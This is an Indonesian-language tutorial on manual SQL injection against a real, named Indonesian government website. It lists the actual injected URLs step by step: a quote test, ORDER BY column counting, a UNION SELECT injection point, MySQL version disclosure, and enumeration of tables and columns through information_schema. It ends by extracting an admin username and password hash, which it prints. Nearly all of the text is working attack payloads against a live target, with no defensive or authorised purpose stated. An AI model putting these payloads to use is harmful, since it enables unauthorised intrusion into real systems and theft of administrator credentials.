Sqli Manual Basic

target:http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27

[tester]
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' 
hasil:
text nya kosong  berarti vuln dinda

[ mencari jumlah kolom ]
lanjutt kita cari jumlah kolomnya

dengan caara menambahkan perintah order by 1-- order by 2-- dan seterusnya sampai menemukan error lagi

http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27 order by 1-- <= tidak error
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27 order by 100-- <= tidak error

nah lohh kok di angka 100 gk error padahal hampir semua web gk sampai 100 walaupun ada yg lebih dari 100 sih 
kita coba bypass dengan cara menambahkan tanda ' di belakang angka id dan +- 

http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 100--+- <= error

xixixi kita telusuri sampai menemukan awal errornya

http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 12--+- <= masih error
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 10--+- <= normal
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=27' order by 11--+- <= error
nahh berarti ini ada 10 tabel heheh
lanjuut 

[ mencari angka injeksi ]
kita cari pakai perintah union select

http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,7,8,9,10--+-
wehh keluar angka 7

lanjutt lagi

[ mencari versi mysql nya ]
dengan menambahkan perintah version() atau @@version
di angka yang keluar tadi
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,version(),8,9,10--+-
hasil: 5.1.69 heheh alhamdulillah dinda 

lanjut lagi'
[ kita keluarkan tabelnya ]
dengan perintah group_cocat(table_name) dan iikuti dengan perintah information_schema.tables where table_schema=database()
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables where table_schema=database()--+-
hasil:
admin_univ,aktivitas_geomagnet,album_galery,artikel,banner,blok_situs,config_situs,download,events,faq,galery,halaman,humas,insidentil,kategori_download,kti,lm_cuaca_antariksa,lm_frekuensi_radio,lm_ozon_polusi,lm_ozon_polusibak,lm_perkiraan_iklim,makalah,menu_situs,news,peneliti,pengamat,pengamatan,poll_answer,poll_ip,poll_question,reinstra_data,reinstra_pengantar,seminar,sessions,topik_artikel,topik_news
ada 2 tabel yang harus kita curgai yakni admin_univ dan config_situs

[ kita buka kolom nya ]
dengan perintah group_concat(column_neme) from information_schema.columns where table_name=hexa dari tabel yang ingin kita buka
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,group_concat(column_name),8,9,10 from information_schema.columns where table_name=0x61646d696e5f756e6976--+-
61646d696e5f756e6976 adalah hexa dari admin_univ
hasil:
aid,username,password,fullname,institution,email,email1,address,city,province,country,zip,phone
kita buka username dan passwordnya

[ buka data]
dengan perintah group_concat(username,0x3a,password) from admin_univ
http://www.bdg.lapan.go.id/index.php?nama=reinstra&opt=detail&id=-27' UNION SELECT 1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10 from admin_univ--+-
hasil:
patah:87683e53d7fd7cda20b3629df4aa44f0